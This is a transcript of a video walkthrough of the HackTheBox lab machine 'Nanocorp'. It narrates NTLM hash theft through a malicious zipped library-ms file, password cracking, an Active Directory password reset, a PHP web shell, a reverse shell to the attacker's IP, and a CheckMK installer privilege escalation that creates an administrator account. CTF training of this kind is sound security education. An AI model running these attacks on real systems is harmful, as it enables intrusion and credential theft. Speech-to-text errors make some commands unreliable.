What's going on YouTube? This is IppSec, and today we'll be doing Nanocorp from HackTheBox, which is a hard Windows machine, and the techniques in this box aren't too hard. The main difficulty comes from enumeration, because there's one thing in particular that's probably going to make you question your sanity. At least it did for me. But before we get to that, we have to enumerate a vulnerability within zip files in Windows because there's a web form where we can upload a zip. This vulnerability lets us leak NTLM hashes. At the time of release, it wasn't too hard because the vulnerability was in the news. However, now it's been almost a year and the vulnerability's become a little bit buried, but there's some recon we can do to help us out there. This gets us credentials, and there's a relatively easy Active Directory path where we can change the password of a user. However, this user can WinRM to the box, but WinRM is configured to only allow encrypted and Kerberos, which isn't supported by Evil-WINRM. And it's very hard to debug it. This is where you'll probably question your sanity trying to debug why your tool isn't working. Using a different toolset gets us WinRM access, and from here we can find out CheckMK is installed and it's vulnerable to a CVE. Exploiting it's mostly straightforward, and that gets us to root. So with that being said, let's jump in. As always, we're going to start with an nmap. So -sc for default scripts, sv enumerate versions, -- reason. This will give us things like the TTL, OA output all formats, put in the nmap directory and call it Nanocorp. And then the IP address of 10.129.16.140. This can take some time to run, so I've already ran it. Looking at the results, we have a handful of ports open, and it looks like it is a Windows box. The very first thing I notice is simple DNS+, and whenever I see this, I scroll down to LDAP, and we can confirm this is going to be Active Directory right here. And I'm just going to go ahead and start populating my host file. So let's do sudo v etc host. And then 10.129.16.140, put in nanocorp.htb, and let's take a look at SSL certificates really quick. We see the computer name is leaked, and this is part of remote desktop, which is a little bit odd to be seeing, but okay. So I'm going to add dco1.nanocorp.htb, and let's just add dco1 as well. So now we have all the types of host names this could be. Let's go through the rest of these results. The next thing we have is HTTP on port 80. Its banner says it's running Apache, which is a little bit odd because it is Windows. The TTL is 127, so if this was going to be like Hyper-V with a Linux VM, I'd expect the TTL to be 62 because default Linux is 63. One hop away is the Windows host, which would be 63. And you go another hop to the Linux machine, which would be 62. But it being 127 indicates this is indeed going to be Apache on Windows. And looking at the server header, it does confirm it right here, Win64. And we can see it's running OpenSSL along with PHP. So it's probably going to be an XAMPP Windows web server, so XAMPP, because that's the common stack when you want to run Apache and PHP on Windows, which is an odd thing to do. I don't know why you wouldn't just use Linux, but I digress. So let's see what else we have. Kerberos, Active Directory, we looked at that. More Active Directory types of ports. Remote desktop, and a clock skew. So I'm going to run NTP date real quick so we can fix the clock issues. Because if I ever do anything Kerberos related, we want to make sure that's fixed. And I may have made a typo in my host file. So sudo v etc host, nanocorp.htb, ping, nanocorp.htb. Okay. I don't know why NTP date isn't working. That's odd. 10.129.16.140. There we go. Was I making like a typo in my NTP date command, or did my internet briefly go out? Okay, things are working. I don't know what happened, but let's just move on. If we have connectivity issues, we know there's probably something going on with our VPN, and we'll have to take a look at it. But let's go into the page. And we see nanocorp.htb. My first thought is it did say it was a PHP web server, but index.php doesn't give us anything. So let's click around. Looking at welcome to Nanocorp doesn't really give us much. Our work doesn't really give us that much. Where are these images hosted? Wait, what? Copy, let's see, copy link, copy image link. It is in a /img. Checking this folder, we can see There is going to be an open directory listing. We also have a thumbs.db, so thumbnails for all these images, but nothing really seems to stick out as shouldn't be here, right? I'd probably look at every single image just to see if anything is out of place. Sometimes you find sensitive things. We do have a contact form, so let's just do ipsec root at ipsec.rocks, and we'll do a password. I don't even know why I said password. Let's say message. Let me go over to Burp Suite. Intercept is on. Go over here. Let's intercept this request. See what we're sending. Go to repeater. And oddly enough, we're sending a post request to index.html. We are sending the message here, but I would expect to see like index.php. I don't know what's going on there. But that does explain why index.php didn't exist. If I click on About Us, we have to turn intercept off. It is. Resend this page. Something is going awry. There we go. So About Us, if I click on Apply Now, we get a unknown domain, hire.nanocorp.htb. So I'm going to go ahead and add this into my host file. So sudo v etc host. And then we can add hire nanocorp htb. Refresh. Burp Suite has this DNS cached a little bit, so it's going to be a bit flaky for probably a minute or two. So let's just take a look at this. So hire.nanocorp.htb, we have submit application. It wants a zip file. So right off the bat, I'm going to see if we can find a upload directory. I'm just going to guess at upload, uploads. We get a forbidden. So the file probably goes in here. So my first thought is maybe we have to upload a PHP file. But I'm going to do a GoBuster, directory mode, URL, word list, op, sec list, discovery, web content, raft, small words.txt, and extension PHP. Because I want to find other PHP scripts here. We can also do, I'll do this in a second. Let's just play with this. Ipsec root at ipsec.rocks. Let's create a file really quick. V shell.php. We'll do PHP system. Let's just do an echo first. Echo success. There we go. Let's browse ipsec HTB Nanocorp. What? /home ipsec. That's weird. HTB Nanocorp. All files shell.php. Hopefully my DNS is uncached by now. Let's intercept this. Send it over to repeater. And try to upload and see what it says. Only zip, 7-zip, and RAR files are allowed. So let's go ahead and change this to be shell.zip. And we still don't get a valid thing. Let's see. Application zip. That still didn't work. Zip shell.php. Is this how we do it? Sure. Cat. That's a file. Let's do base64. I'm going to do W0 echo. I'm going to copy this into Burp Suite. I could just redo the upload form, but I'm a bit lazy to do that. So this is what we can also do. Convert selection, base64, decode. There we go. This now has the zip header. And it has been uploaded. The location is success.php. If I follow this redirect, we don't really get anything. So my first thought, let's see if the file name is correct. So we did shell.zip. Let's turn Burp Suite off. Nanocorp. Let's do, was it hire.nanocorp? There we go. I think upload was the directory. Is this where we got the 403? Uploads. Forbidden. Awesome. Shell.zip. Oh, we can't even access. I was expecting like A404. So maybe we can't access anything in that directory at all. So the next step is a bit of a reach. When this box first came out, the CVE was more in the news, but now it's been quite a while since the box was released and becomes somewhat hard to see. So one thing I like doing is taking a look at the images on a web server. And I'm going to do it two ways. I'm going to do from curl.jpg as well. So we have two images. If I do exif tool on the from curl, we can look at the timestamps and we see all these are the same. Now there is a flag in curl to preserve the file modification timestamp, but I always forget that. This is why when doing this trick, I prefer just using wget, right? So I'm going to look at exif tool on nanocorp.jpg. And here we go. We can see the file was probably uploaded to the web server at this time because wget preserved this timestamp by default. So 2025, April 2nd. So we're probably going to be looking for vulnerabilities early 2025 because we probably wouldn't create a box before the vulnerability is publicized. So I'm going to guess February or March 2025 for vulnerabilities. So let's just go to Google and say vulnerabilities, Windows 2025, March, February. I'll add January too. And see if we have anything. Over here, Google's AI, security feature, Microsoft Management Console, no, NTFS, February. Nothing here. I wonder if we add zip to this because we're uploading a zip file. Let's see. Do we have anything? NTLM hash disclosure for credentials. So it may be something like this CVE. This is talking about virtual hard drive, whatever. So let's get some details here. So I'm going to go Google again. Let's do this. POC GitHub. And this is going to be the library MS. And I think we showed this once before. It's probably on like a box called signed or something. I forget exactly what box it is. But let's see. Is this going to be it? POC NTM hash link via this on unpatched Windows systems. So let's go ahead and clone this real quick. I don't know why this is tied to zips though. But okay, git clone, CVE. What is exploit.py? Is it really just changing that? -- share, attacker host. Yeah, we should be able to just put our IP address here. So let's do 10.10.14.171. Okay, let's zip test.zip on this file and sudo responder -i ton0. That's fine. And let's go ahead and do this really quick. So we called this test.zip. We will copy this, go back to burp, and I'm going to do the same thing again. I copied instead of pasted. Convert selection, decode, send it. I'm going to run a sleep for 2 minutes to see if anything comes up while we take a look at this. So we have a assets directory. Everything else is 403. Success.php is a 302, redirects us. We got images, assets, and that's it. So let's go ahead and take a look at images while we wait. So images. You also get the timestamp right here. So we got exactly what we did from our wget. Assets was the other one, right? Yeah. Assets. And that's the CSS. April 5th April 2nd. So nothing too interesting. Looking back at our responder, we don't have anything. And it's been 2 minutes and we don't have any hits back. So either it's not vulnerable to this or we screwed something up. It's likely probably going to be both. So what if we just run this exploit real quick? Python 3 exploit.py. We are 10, 10, 14, 171. Let's see. It's successfully pointing there. Okay. I wonder if it's how we did the base64 encode. So let's go ahead and really quick try one change. So we're just going to upload the zip manually. So we'll do, let's do rmtest.zip, zip, parent.zip, or we'll do xdzip, xd library ms. Go in here, submit it. Let's make sure we get the success. Burp Suite is on intercept. We got an error. What? Okay, there we go. Our resume has been received. So let's go down here. I'm just going to do a sleep 120. And I'm going to see if there's anything specific with zipping on this POC. So let's go back here. And I'm going to add zip to this and archive. Let's see. Advisory. I think that's the same repo. Let's see. Windows spoofing NTLM hash disclosure. .library ms when target extracts a zip. I want it the file is just .library dash ms and putting the file name first, like xd is what's screwing this up. Or it's not vulnerable to this. I got the wrong CVE. Oh, no, there we go. We have it. I think it's probably how I uploaded it before. So there we go. We have a hash here, web service Nanocorp. So I'm going to copy this. V web svc dot, we'll call it NTLMv2. Paste this. And now let's go over to the Kraken where I just run hashcat. You can run it on your host machine. I wouldn't recommend running it in a VM, although in a pinch you can. But I'm going to do v hashes and I'm going to call this nanocorp.ntlmv2. Paste that. And then we can say /hashcat. Then hashes opt word list rocku.txt. And let's see if this starts cracking. And then I guess while this goes, I am kind of curious. I'm going to go to HTTP history. Oh, I didn't save what I uploaded because I turned Burp Suite off, I think. Right? This isn't the file. Yeah. I was hoping I could just go look at my history and see exactly the difference between the two zips because I probably just screwed it up when I was doing the base64 decode. But we have the password hash. So let's go ahead and look at it. And web service is this. I'm surprised that cracked so quickly, but let's go ahead and try this. So let's do a netexec, smb, dco1 nanocorp.htb, user web service, and the password of this. We can turn impacket off. And it authenticates. Awesome. So let's go and try like WinRM. Let's do nc-zv. Was it 1010? We can just do dco1 nanocorp.htb. 5985. That port's not open. 5986 is. So 5985 is WinRM plain text. 5986 is the SSL version, but we can see here, doesn't look like we can authenticate. So at this point, what I want to do is run RustHound or BloodyAD, because at this point, we probably should just start looking at Active Directory. So I'm going to do getTGT .py, and then we can say, what is the syntax? DCIP, DC01 nanocorp.htb, nanocorp.htb/web service. That's not the password. Well, that is. There's still a lot of junk. So let's do a few deletes to get to where just the password is. Awesome. And I've already synced the time, so hopefully this command works. It looks like it does. We have the ticket right here. So I'm going to do a, we have to generate the KRB5 file. So netexec, actually, I'll show what happens if we don't. So we can say KRB5cc name is equal to this. And then RustHound domain nanocorp.htb, Kerberos, and the DC name is DC01 nanocorp.htb. See, we get a authentication failure. It can't find the key distribution center. I think that's what KDC means for this. So what we want to do now is create our Kerberos file, and we can use netexec to do it. Let's do DC01 nanocorp.htb, generate KRB5 file, nanocorp.krb5. There we go. And let's see, it should give us the export command. So if we now export this, now Kerberos is going to be configured to use this file. So if we just look at it, you can see it's just like the domain realm and things like that. But I'm going to go ahead and run that same exact command we did. And now RustHound authenticates, and we're going to start pulling all the JSON files. So at this point, we can now log into Bloodhound. So 127.0.0.1, I think I have it listening on, I thought it was 80.88. Docker PS 80.81 is where I have Bloodhound listening. So I've already started this up and ingested it, so we don't have to wait. Normally, like I go to administration, file import, and import the files, but I don't feel like pausing the video to do that because it does take like 2 to 3 minutes to import all the files. So they're already imported. We can do web service and see where we are. So we're Nanocorp. If we look at what members we are, we can see just domain users goes to authenticated users and nothing too fancy here, right? The main tab I like looking at is this outbound object control. And we can see I can add myself to the IT support group. And then if we look at this, go to outbound object control, we can see we can change the password of monitoring service. So we want to go from, let's see, I'm going to just do vnotes.txt, web service. I don't know if I did that name correctly. I think that it was an underscore to add group. This is IT support, change password to monitoring service. So let's see what this gets us. So if I click on this, we no longer have any outbound object control. We're a member of 7 groups. If we take a look at this, we're domain user, protected user, and remote management. Now, remote management can probably remote desktop. Protected users, this is going to block any use of outdated authentication, such as wdigest, NTLM, things like that. So you have to use Kerberos authentication with this account. Remote desktop is enabled, so maybe monitoring service can just RDP into the box. If not, we did see WinRM was configured on port 5986, so we can log in that way as well. So we want to get over to this monitoring service account. So we have our attack path. So let's go ahead and implement it. So to do that, I'm mainly going to use BloodyAD. Did I do it from this pane? Yeah, this actually, let's run that export again. Export, there we go. We have to do it on this pane down here. Right? Yeah. vnotes. Leave that so you can see what we're doing. Okay. The first step is using BloodyAD to add ourselves to the group. So I'm going to do KRB5cc name. Do this again. Is it web service? That's not it. What was that file? Was I in that CVE directory when I created that? I was. Let's just move that to my home directory. There we go. Now I can run BloodyAD. And the command we want is going to be --host dco1 nanocorp.htb domain nanocorp.htb. And we'll use Kerberos. And the command is going to be add, I want to say group member. Yep. And the casing does matter. So group, then capital M for member. IT support to web SVC. So this is going to add ourselves to that group. We see web service has been added to IT support. So the next thing we want to do is set a password. So we can say set password, monitoring service, and I'm going to do password1 exclamation point. So this is going to change the password to that account, and it failed. Add group member, already in the group. That is weird. Huh. Oh, wait a second. Let's get a new ticket. I think what happened is this cache has information about our group in it, right? So since it has information in our group and then we added ourselves to the group, this ticket's outdated. And when it's saying, let me change the password, it's like, hey, you're not in IT support when we know we are. So let's do export, not that, getTGT. I'm just going to go up here in this pane. Do we have that command? There we go. Run it there. Now we saved it. Run this again. There we go. Password has been changed successfully. So again, like that ticket bites me quite often. You do Kerberos, you make a change to the account, you keep trying to use the same ticket, and it doesn't work because the ticket does contain information about the group. Let's see. I wonder if we have like describe ticket. I think this does it, right? Let's see. I wish I saved that old ticket. I'm not seeing it off the eyeball, but I'm almost positive that's what happened because the password change definitely worked once we got the new ticket. So let's just move on with our life. And what do we want to do? We have to authenticate. So we can say KRB+SSL name. We want to do getTGT again. So let's do this. We're going to change this to, what is it? Monitor. There's monitoring service, right? Yeah. And then password1 exclamation point. That did not work. There we go. So now we have it. There was a cleanup script, I think, that just reverted the password. So that's why it failed. I changed it again and it worked. But now that we have this ticket, we don't have to worry about the cleanup script changing the password because even the password changes, the ticket will still say we're authenticated until it expires. So now let's go ahead and say KRB+SSL name is equal to monitoring service. And then we can use netexec. So netexec, I'm going to do WinRM first. Let's see, dco1 nanocorp.htb-k. And is there like a KRB file or something? Let's see. Yeah, we need this use kcache. So let's see if this authenticates us. We're trying the monitoring service. Come on. It may, I think it's probably going to try to like do 5985 first, timeout, and then switch over to the next one. And it doesn't say pwned, which is a little bit concerning. We were in the protected users group, but I want to say WinRM should have worked there. I want our RDP. Are there other options we could use? So we did use kcache. That should work. what happened here? Old schema, save the database, and then, okay, let's just do this, run this. We successfully authenticate, but it doesn't say pwned, so I don't think we have access via RDP either. I was really hoping the WinRM would show on netexec, but I could be running an out-of-date thing, or maybe it's just a little bit wonky. I know, like, if we used Evil-WINRM-Pi, it supports Kerberos authentication, but if you have, I'm going to say, if you're missing a lot of libraries, it just doesn't work. And I'm guessing my box here is missing some libraries, so this piece is not working, which is a bit annoying. If we just try to use Evil-WINRM, it doesn't work out of the box. You could customize it, probably give Claude like the issue, and it probably would fix it. But here it's also kind of wonky. I'm going to show it really quick. So let's see, Evil-WINRM, we do -I, we can say dco1.nanocorp.hdb. The realm, it's probably going to be dco1.nanocorp.hdb. And then let's do user monitoring service. Password is password1 exclamation point. That should be fine. --SSL and port 5986. And it says user's not needed for Kerberos Auth. Password's not needed for Kerberos Auth. So notate this. It's going to time out eventually. It's a long timeout. I like using WinRMexec and Python. This is going to use the impacket library, so it doesn't depend a lot on other things. Let's see. Is this it? This is a WinRM Pi. Let's see, is it WinRM-exec? WinRMexec impacket. So that failed. If I take the username and password out, so I'm going to do that really quick. It doesn't work. So it's kind of funny that the error message says you don't need user and password when we do Kerberos authentication. You take these fields out, it doesn't work. Let's see. PowerShell, Evil-WINRM. That's not it. If I used Evil-WINRM-Pi, we can say -I dco1 dot. Let's go here real quick, because I know this doesn't work either. Let's see. I think we just need I as IP. Where is port? There is SSL, so maybe just adding SSL will switch it to 5986. Let's see, -K. No option for that. Monitoring service. Password1 exclamation point. Failed to authenticate with NTLM. There's no option for Kerberos here, and I think that's because I'm missing a library. And I don't like how Evil-WINRM Pi does that. Here we go. Oh, that's WMI-exec. That's not it. And this is probably one of the hardest parts about the box, finding the right tool and understanding the tool is causing an issue. Also finding that one vulnerability that we saw earlier, the whole like zip thing was a bit odd. Is this it? There is a action run. Is this it? Let's see. WinRMexec GitHub. Here it is. This is what I want. I'm assuming maybe this is going to be it. Maybe it's a PR, but I'm just going to download this file. So we can do a wget WinRMexec. If we look at it, I want to say it's using impacket, right? Yeah. So let's go ahead and try this. So let's see, what are the options? Python 3, WinRMexec, thinking. Let's see, KRB+5cc name is equal to monitoring service. I'm going to specify K, nanocorp.htb / monitoring service at dco1 nanocorp.htb. We need probably add no pass. Okay. I think it may be working. It's requesting the ticket granting service. Let's see. Port not specified using 5985. We don't want that. We want dash port 5986. There may be like an SSL flag. Let's see. Yep, let's add dash SSL. And there we go. Now we are on the box as monitoring service. Awesome. So let's do cd ... We can probably say cd desktop dir and get user.txt there. So now that I'm on the box, my first thought is maybe we can upload a PHP script, get code execution that way, and then that will give us a shell with seimpersonate, and we can privesc that way, right? So let's get a shell as the web server, at least see if we can easily do that. If I go into, what is it, examp, probably like HTDocs or something like that. I think this is where it stores it. Yep. So let's go into hire. And let's see, echo test to pwn.php. And it looks like we can. If we do type pwn.php, and we have the file. So let's do echo and say php system. Let's do actually $request cmd. So this lets us run commands to pwn.php. And it's hanging, which is a little bit odd. Let's see, curl http we have antivirus blocking us. Was it pwn.php there? What? Okay. So it blocked the file, right? We still have it saying test. So Defender blocks it. It's probably flagging on like PHP system because Defender's a signature based one. I'm just going to put like an echo test. And it worked. Awesome. But we don't have it executing code still. We can see it's still giving us the PHP tag. And the reason here, I think, is going to be it's UTF-16 little endian encoded, which means examp is not flagging it, right? If I do XXD here, we can see everything is 2 bytes. So I'm going to do, let's see, if we do set content dash path pwn.php value, is that going to fix it? We may have to recreate the file. Do a dir. Nope, it goes down to 49 bytes. So exactly half because we're not putting that null byte after each thing. And if we now curl it, we get the error message because we have a variable. So let's do -d cmd equals who am I? There we go. Who am I /all. And we don't have the seimpersonate flag. We can see what groups we're a member of, right? Windows Authority Batch, but I didn't really see anything we could exploit. We are oddly a member of remote desktop users, but after, like, I think when the process starts, it has this, and then it gets removed or something, because we definitely didn't see this in WLOODHOUND. Something odd is going on there, but I think it's an HTTP type of thing. Or a lab type of thing, I should say. Let's see, what else could we look at? Well, when I was doing this box, I did try a lot of things. There is a technique, I put it as original token on signed. I tried this to see if this would get it. It did not work. I'm not going to waste like the 5-10 minutes to do that. I think it's like if we Google, if you go to this blog post and find it, it's this attack. I tried a bunch of other things to try to get seimpersonate back. I never could get it here. That turned out to be a dead end. So if we go back into this shell, if I run task, maximize the wrong thing, task list, this is going to fail because we're not a interactive session. Get process is going to work. So if I just did get dash process, we can look at all the running processes on the box. It looks like it's using WinRAR. That's probably the zip thing. SVC host. Is there anything interesting we see that's non-Microsoft? You can see Defender there. Explorer. So there is a interactive session. And then we see this CheckMK agent. So this is interesting. If we go to Google, CheckMK agent, vulnerability, there is a CVE in 2025 with a local privesc. We could probably find this binary. It's probably going to be in like program data is my guess. There is an uninstall. So type, let's see this real quick. Agent version 2.1 is what it says. Does this tell us what version? 2.2 is when it's patched. So this is definitely going to be vulnerable. And essentially what this is, they're copying this mal.exe, which I think is MSF Venom generated, over all these CMD files. And then they're going to set the property to read only. And what the vulnerability is the MSI file from CheckMK is just going to execute something in this file. And I think this is going to be the PID. So what we do is we pre-populate all the PIDs for this, set it to read only. So now the MSI can't change the CMD. And then when it executes, it's going to execute the command we want it to, not the other thing, right? Here we go. We have MSF Venom. This is how they're creating mal.exe. It's just cmd/c who am I to a file. Very simple. So let's see. And then they run MSI exec on the installer. So this is what we have to do. Let's create a file. And I'm just going to have it, instead of running an exe, I'm going to have a PowerShell script it executes. I'm going to do set content -path. I'm going to call it add user.cmd. And I'm using set content to make sure it is not UTF-16, right? Because this is going to be a batch file. We're going to turn echo off. And then if I do backtick n, this is going to insert a line break. So I'm going to just run who am I to C:, we need to direct it, to C:/ program data pwn. And then I'm going to do a backtick n for new line, net user ipsec password 1. I'm going to do /add. I'm going to say domain because this is a domain controller, backtick n. And then I'm going to do a net local group administrators ipsec add domain like this. So let's do a type on add user.cmd. And you can see the command. So we turn echo off like all batch scripts. We do who am I? We're putting it in program data pwn. So we know if the command ever executed. We're doing net user. We're going to add myself as a user. I'm going to add myself to the administrators group. I want to say I have to have this /domain flag. I'm not positive by that, but let's try it out. So now we want to run this command. I'm going to do this for each. I'm going to copy add user.cmd to that. And then we're going to set the property to read only. And that. And this is probably going to take probably 30 or 60 seconds to run because we're creating, 20,000 files. So it's not the most instant thing, but it should finish relatively quickly. Let's see. Can I just go It's going to be easier to just go to WinRMexec again. Let's copy this. No pass, port 5986 SSL. We'll get a second session on this box while we're waiting. So we can go cd Windows temp dir. We can't list files, but I should be able to do type CMK all. Let's do 10,000 underscore 1.cmd, and we can see the file. So while it's creating the files, I guess we just have to wait, but we can see it is creating them. If we do 20,000, that's there. So it should be almost done, right? 26,000. Is it done? 29. There we go. So it's created all the files. Awesome. So what is the next thing? Let's go back to the blog post. We have to run this. So C:\Windows installer. And then we have a few MSIs. And these MSIs, when you execute it, it's just going to be like a cached version or something. I don't fully understand what goes on here, but we have to figure out which of these MSIs is going to be CheckMK. See, does it give a file size? Because if it did, we could just compare the file size, but I don't think it does. No, it doesn't. So all these are going to be stored in the Windows registry. So let's do a cd hkey local machine. And let's see, that's in software, Microsoft, Windows current version installer. I screwed something up. Windows current version. Okay, let's see. After this, it is user data, this weird S directory, products, and then let's see, F2. If we go in one of these, this is the installer for the Visual Studio runtime. But we want to get all the install packages, right? We can see Visual Studio runtime is 387ca.msi. But if I go up one directory, we can say GCI, and every directory, get the install properties. And then I'm going to select, what do we want? Local package. And let's see, display version, install source, uninstall. There should be, oh, display name. There we go. So select, display name, local package. That didn't work. Okay, we have everything. We probably need like a for loop or something. But what I'm going to do, I'm going to search up for CheckMK agent. So we can see here, CheckMK agent version 2.1. And what we want to do is go up to the local package. And this is going to be 1E6F2. So let's do CDC : to switch back there. And there is a 1E6F2. So this is going to be the CheckMK. We could have probably also just guessed, since all these are at the same time, this is probably Windows Update. This is probably something custom. But yeah, let's go MSI exec /FA C:\Windows installer this cmd/c. It's weird that we didn't see anything. Windows installer service cannot be accessed. It may be because the Windows installer is not correctly installed. If we do a net user, the user did not get created. So what I'm going to do, I'm going to try this real quick. Did we do it here? Where was our thing? Curl http hire.nanocorp.htb/pwn.php. This is it, right? And it still exists. Awesome. -d cmd is equal to this. I probably don't need the cmd/c. I'm just going to see if this works. Dash out. Let's just do a net user now. Still nothing. Output dash. Dash dash output. Standard out. That is still not working. So it looks like even from this web shell, that's not working. We can use RunasCS. Because I'm guessing maybe since this started as a service, it's still, well, taskless works. Let's see, QW insta. That is working. I kind of expected this to work, honestly. Do I have a typo? SQL and Windows installer. So something is odd going on. User not created. I'm going to get upload RunasCS, and we're going to try it here. Maybe something odd is happening in that web shell that prevents MSI exec from running. It is definitely odd because I'm used to seeing when I can run task list, things just magically work, right? Because this fails. If I do the QW insta command here, it's also going to fail cmd/c QW insta. So there's definitely a difference between the shell here and the shell in my WinRM, but I don't know exactly what it is. Let's do make dir dub. I'm gonna copy opt. Let's do find/opt grep run as. Let's do -i. Let's go ahead and copy this. Run as dot. I'll do cs.exe. Awesome. Curl HTTP 10.10.14.171 8000 run as cs.exe. That's now saved. So let's get a reverse shell. So I'm going to do a run as cs.exe, the web service user, and the password. What was it? Let's see. Web service history grep-i web service grep-i TGT. We have the password here. This is the one we cracked not too long ago, right? So we have username, password. I'm going to do cmd.exe to 10.10.14.171, port 9001. Is there anything else I need in this? I don't think so. QW insta. Okay. Let's run the same exact MSI exec command. Copy. Paste. Doesn't fail. Net user. I still don't have IPsec. That's taking a much longer time. Huh. Let's see. Add user.cmd. Net user IPsec. Those commands should work. I'm going to hope the cleanup script did not just screw me over. Let's see. CD. Was it Windows temp? Where's the file example? See, it should be what, like 10,000? I think the cleanup script screwed me over. Because that file no longer exists. Where is it? That's got to be the issue. Let's do C:\program data. There we go. Going to copy this exact command, run it. And it may or may not work now because we don't have all the PIDs replicated, but we may have enough where it just magically works. Nope. Let's see. This is why I also create program data. Was it pwn? This is before the add user command, right? And we don't have a pwn created. So our command is not being ran at all. Dir C:\program data pwn. It's thinking about it. It's definitely taking a little bit longer. Did it work? See, let's just do net user. Does not exist. Huh. I'm thinking maybe it's working. I hope that this didn't break anything. I can't imagine adding this semicolon to dir to actually screw anything up. But I'm guessing maybe it's just taking a while to spin up MSI nxc smb dc01 nanocorp.htb user ipsec password 1 login failure. That's kind of what I expected because this command has not finished yet. Do we still have the run as? Okay. Let's do -h real quick. Program data. Is it --help? It's wondering if there's other login session we should be using. Run this again. Copy. Paste. That finished much quicker. I still don't have ipsec. And we don't have a pwn. Let's see. Change the login type to 2. Which I think is the default login type. So that does not fix it. Do we have typed? Is that how we got it? I just want to make sure this file exists again. Copy. Why is that not copying? CMK all 10.0.0.0 1 CMD. This is getting annoying. Let's see. Type. Let's go ahead and create these files yet again. And I'm going to run this again. And there's a part of me that's somewhat worried that having this MSI exec running is breaking this MSI exec. But I'm not positive. I'm just going to keep running this periodically. Net user. Okay, I'm going to wait for this command to finish. And as soon as it does, we're going to run this command. Okay, that command is finished. I'm going to run this CMD again. And we see the installer does come back, net user, and that still is not working. Do I have an extra 10123 underscore 1.cmd. That definitely doesn't work because I erased an extra thing. Oh, come on. Is my shell dead? Okay. Let's run this. CD / Windows temp. Type. Okay, that file definitely does exist. If I do that type again, let's do actually this, and then this. Is that not doing what I thought it would? Oh, it's hanging a while. I'm about to just create an executable and upload this. Let's see. Who am I? C:\program data pwn. That should definitely work. Let's do this again. Not working. So let's try something else real quick. Right here, when we're creating the PIDs, we're doing 10,000 to 3,000. I'm going to do 1 to 10,000 real quick. And we'll try this. Because if we do get process, do we see the PIDs We can probably just do task list now. Does this give us the PID? Yeah. Maybe if I am right and that is the PID that's running, maybe we're not hitting process like 10,001 yet, because this is a lab, boxes aren't running that long, and the PID is kind of incremental. So maybe that's it. We'll just try this out real quick, this theory. So we can start copying this command, run it, dir:/program data, and pwn exist. So that was it. It wasn't just the cleanup script. It was also, we had a bad like concept of the exploit, right? We do pwn, NT-authority system, net user, IPsec does exist. So now, if I do this, we should see it pwned. Yep. So we can just do now Evil-WINRM -i dco1.nanocorp.htb. User is going to be IPsec password 1, port 5986. Is it --SSL? I think so. And this will work. We're not a member of protected users, so we can do NTLM authentication, which WinRM supports, and that lets us in the box. So if we do cd administrator, desktop, we could get root.txt this way, right? Yep. Awesome. That's the box. So we probably have to read this whole blog post. It may actually make sense, but again, long-running boxes, this is probably good because the PIDs will increment. I'm assuming this is PID, right? Here, the range of probable IDs was determined between 10,000 and 30,000. PID? Maybe not. But I think the longer the box is running, the higher that number is going to be. Because the box isn't running that long, it's a low number, and we just had to change the POC. I bet if we looked at GitHub or other things, they'd have different loops that would do that for us. But hopefully that all makes sense. Take care, everyone, and I will see you all next time.